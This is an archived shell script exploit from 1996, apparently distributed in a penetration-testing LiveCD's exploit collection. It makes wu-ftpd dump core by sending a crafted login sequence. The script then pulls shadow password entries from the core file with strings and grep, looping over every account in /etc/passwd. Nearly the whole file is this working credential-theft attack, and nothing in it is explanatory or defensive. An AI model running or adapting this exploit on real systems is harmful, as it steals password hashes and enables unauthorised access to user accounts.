home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / ftpd-dump.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  841 b   |  45 lines
  1. #!/bin/sh
  2. #
  3. # exploit a bug in wu-ftpd to assemble & view the shadow passwd file
  4. #
  5. # Tested under Solaris 2.5
  6. #
  7. # James Abendschan  jwa@nbs.nau.edu  16 Oct 1996
  8. #
  9.  
  10. USER=`whoami`
  11. /usr/ucb/echo -n "Enter your password for localhost: "
  12. read PASS
  13.  
  14. WDIR=/tmp/wu-ftpd-sploit.$USER
  15. rm -rf $WDIR
  16. mkdir $WDIR
  17. TMP=$WDIR/strings.tmp
  18.  
  19. ftp -n localhost << _EOF_
  20. quote user $USER
  21. quote pass $PASS
  22. cd $WDIR
  23. user root woot
  24. quote pasv
  25. _EOF_
  26.  
  27. if [ ! -f $WDIR/core ]
  28. then
  29.  echo "Sorry, your ftpd didn't dump core."
  30.  exit 1
  31. fi
  32.  
  33. strings $WDIR/core > $WDIR/tmp
  34.  
  35. # try to assemble as much of the shadow passwd file as possible
  36. # (easier in perl)
  37.  
  38. for user in `cat /etc/passwd | awk -F":" '{print $1}'`
  39. do 
  40.  line=`grep \^${user}: $WDIR/tmp`
  41.  echo $line
  42. done 
  43.  
  44. rm -f $TMP
  45. #                 www.hack.co.za           [2000]#